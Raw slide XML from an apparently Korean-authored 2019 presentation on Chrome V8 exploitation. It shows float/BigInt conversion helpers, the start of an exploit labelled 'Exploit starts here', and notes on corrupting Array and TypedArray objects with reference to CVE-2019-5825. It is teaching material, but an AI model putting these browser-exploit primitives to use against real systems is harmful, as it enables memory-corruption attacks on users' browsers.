                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.float_to_low_32bit = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return int_view[0] &amp; 0xffffffffn;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.setHighUint32 = function(val) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    int_view[0] = (int_view[0] &amp; 0x00000000ffffffffn) | (val &lt;&lt; 32n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return float_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.setLowUint32 = function(val) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    int_view[0] = (int_view[0] &amp; 0xffffffff00000000n) | val;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return float_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// *******************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// Exploit starts here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// *******************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let iter_cnt = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var float_array;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var tarr, tarr2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var aarw_tarr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var obj_addrof;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var view;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="슬라이드 번호 개체 틀 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40340D3-DFD6-4989-A089-6216DA594E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F3ECD9F8-CFA2-4FC9-86A0-B66D202A3856}" type="slidenum">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="날짜 개체 틀 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D94AD68-BEA4-43B7-92ED-79069329FD1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{926B7C34-4943-471F-B3D2-6E9614CA7F62}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019-11-28</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2339350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6EA12D6-02F0-4F96-B7F7-733A048C47CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381109" y="1169658"/>
            <a:ext cx="11047881" cy="110799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pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>In the code "let float_array = [0x41414141];“, It is convenient to assume that the Array object uses only 8 bytes. Even if it doesn't work that way, it helps for exploits. Therefore, 64 bits corresponding to 8 bytes are not suitable for 32 bits. In other cases, you may not be able to manipulate the corruption using Array objects in 32-bit Windows Chrome Browsers. In this case, you must use a TypedArray.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>(In recent cases, it is the "CVE-2019-5825" vulnerability. I used Uint32Array. You can also use BigUint64Array. But I've only used Uint32Array because it's easy to handle in 4 bytes.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>Fortunately, in the current case, unlike the "CVE-2019-5825", Chrome browser tabs do not crash after memory corruption when Array objects are damaged.</a:t>
            </a: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7" y="866181"/>
            <a:ext cx="11052923" cy="30777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a:t>The descriptions for helper functions are as follows.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E606085-9C3A-41BB-B648-AD4A9BE97A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203851" y="2344565"/>
            <a:ext cx="3784297" cy="4025957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// HELPER FUNCTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let conversion_buffer = new ArrayBuffer(8);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let float_view = new Float64Array(conversion_buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let int_view = new BigUint64Array(conversion_buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.float_to_high_32bit = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return (int_view[0] &gt;&gt; 32n) &amp; 0xffffffffn;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.float_to_low_32bit = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return int_view[0] &amp; 0xffffffffn;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.setHighUint32 = function(val) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    int_view[0] = (int_view[0] &amp; 0x00000000ffffffffn) | (val &lt;&lt; 32n);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return float_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>Number.prototype.setLowUint32 = function(val) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    float_view[0] = this;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    int_view[0] = (int_view[0] &amp; 0xffffffff00000000n) | val;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>    return float_view[0];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// *******************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// Exploit starts here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// *******************</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>let iter_cnt = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var float_array;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var tarr, tarr2;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var aarw_tarr;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var obj_addrof;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>var view;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
